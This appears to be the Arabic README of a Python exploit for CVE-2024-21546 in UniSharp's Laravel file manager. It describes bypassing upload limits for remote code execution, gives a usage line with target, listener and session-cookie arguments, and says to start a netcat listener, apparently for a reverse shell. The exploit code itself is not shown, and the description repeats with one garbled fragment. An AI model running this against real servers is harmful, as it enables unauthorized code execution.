
يستهدف هذا النص البرمجي الاستغلالي المكتوب بلغة بايثون مدير الملفات Laravel الضعيف الذي أنشأته UniSharp، والذي يسمح للمستخدمين المصادق عليهم بتجاوز قيود الملفات وتحميل ملفات ضارة. وهذا يمكن أن يؤدي إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عند تشغيل الحمولة المرفوعة.
هذا النص البرمجي الاستغلالي بلغة Python يستهدف مدير ملفات Laravel الضعيف الذي أنشأته UniSharp، والذي يسمح للمستخدمين الموثَّقين بتجاوز قيود الملفات ورفع ملفات ضارة. يمكن أن يؤدي ذلك إلى تنفيذ التعليمات البرمجية عن بُعد (RCE) عند تشغيل الحمولة المرفوعة.
يقوم النص البرمجي الاستغلالي بما يلي:
laravel_session المقدمة من المستخدم_token الخاص بـ CSRF عبر تعبير عادي (regex)الإصدار 2.9.1 والإصدارات السابقة له
python3 CVE-2024-21546.py <target_url> <listener_ip> <listener_port> <laravel_session>
مهم: قم بتشغيل المستمع الخاص بك قبل تشغيل البرنامج النصي:
nc -lvnp <listener_port>
